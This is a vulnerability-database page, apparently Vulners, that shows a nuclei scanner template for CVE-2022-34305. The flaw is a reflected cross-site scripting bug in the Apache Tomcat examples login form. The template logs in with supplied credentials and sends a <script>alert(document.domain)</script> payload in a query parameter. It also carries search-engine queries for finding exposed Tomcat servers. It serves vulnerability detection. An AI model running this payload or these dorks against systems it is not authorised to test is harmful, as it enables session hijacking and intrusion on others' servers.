Lucene search
K

Apache Tomcat Examples Web Application - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Reflected cross site scripting in Tomcat examples login form; update to the latest version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: IBM Rational Build Forge 8.0.0.24 addresses multiple vulnerabilities by updating Apache Tomcat Server
31 Oct 202315:09
ibm
IBM Security Bulletins
Security Bulletin: IBM Cloud Pak for Security includes components with multiple known vulnerabilities
8 Jun 202321:56
ibm
IBM Security Bulletins
Security Bulletin: IBM Sterling Partner Engagement Manager is vulnerable to cross-site scripting due to Apache Tomcat (CVE-2022-34305)
10 Jan 202310:31
ibm
IBM Security Bulletins
Security Bulletin: The CVE-2022-34305 vulnerability in Apache Tomcat affects App Connect Professional.
15 Jul 202205:52
ibm
IBM Security Bulletins
Security Bulletin: IBM Sterling Control Center is affected by vulnerability in Apache Tomcat
7 Nov 202407:43
ibm
IBM Security Bulletins
Security Bulletin: Netcool Operations Insights 1.6.9 addresses multiple security vulnerabilities.
18 Jul 202313:09
ibm
IBM Security Bulletins
Security Bulletin: IBM UrbanCode Build is affected by CVE-2022-34305
20 Dec 202207:05
ibm
IBM Security Bulletins
Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities including remote code execution in Apache Log4j 1.x
3 Aug 202216:43
ibm
IBM Security Bulletins
Security Bulletin: IBM UrbanCode Release is affected by CVE-2022-34305
20 Jan 202316:08
ibm
IBM Security Bulletins
Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to cross-site scripting in Apache Tomcat (CVE-2022-34305)
12 Jan 202321:59
ibm
Rows per page
id: CVE-2022-34305

info:
  name: Apache Tomcat Examples Web Application - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Apache Tomcat 8.5.50 to 8.5.81, 9.0.30 to 9.0.64, 10.0.0-M1 to 10.0.22, and 10.1.0-M1 to 10.1.0-M16 contain a reflected cross-site scripting caused by displaying unfiltered user data in the Form authentication example, letting attackers execute scripts in victim browsers, exploit requires attacker to craft malicious input.
  impact: |
    Attackers can execute malicious scripts in victim browsers, leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to the latest version of Apache Tomcat where this issue is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-34305
    - https://github.com/zeroc00I/CVE-2022-34305
    - https://lists.apache.org/thread/k04zk0nq6w57m72w5gb0r6z9ryhmvr4k
    - https://security.gentoo.org/glsa/202208-34
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-34305
    cwe-id: CWE-79
    epss-score: 0.06156
    epss-percentile: 0.92609
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: apache
    product: tomcat
    shodan-query:
      - cpe:"cpe:2.3:a:apache:tomcat"
      - http.component:"apache tomcat"
    fofa-query: body="apache tomcat"
    google-query: site:*/examples/jsp/snp/snoop.jsp
  tags: cve,cve2022,xss,apache,tomcat,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /examples/jsp/security/protected/index.jsp HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: jsessionid_form
        group: 1
        regex:
          - "action='j_security_check;jsessionid=([A-Z0-9]+)'"
        internal: true

  - raw:
      - |
        POST /examples/jsp/security/protected/j_security_check;jsessionid={{jsessionid_form}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        GET /examples/jsp/security/protected/index.jsp?dataName=%3Cscript%3Ealert(document.domain)%3C/script%3E&dataValue=demo HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 4a0a0047304502202b9472cf2e269fb64144af6243f343080a8e7f38fac3e57493bda5cfbfab080f022100f8e0f3117884b12b8268fc47781e58adda58409db68ff8220601173000b8c9e2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24.3
CVSS 3.16.1
EPSS0.06156
22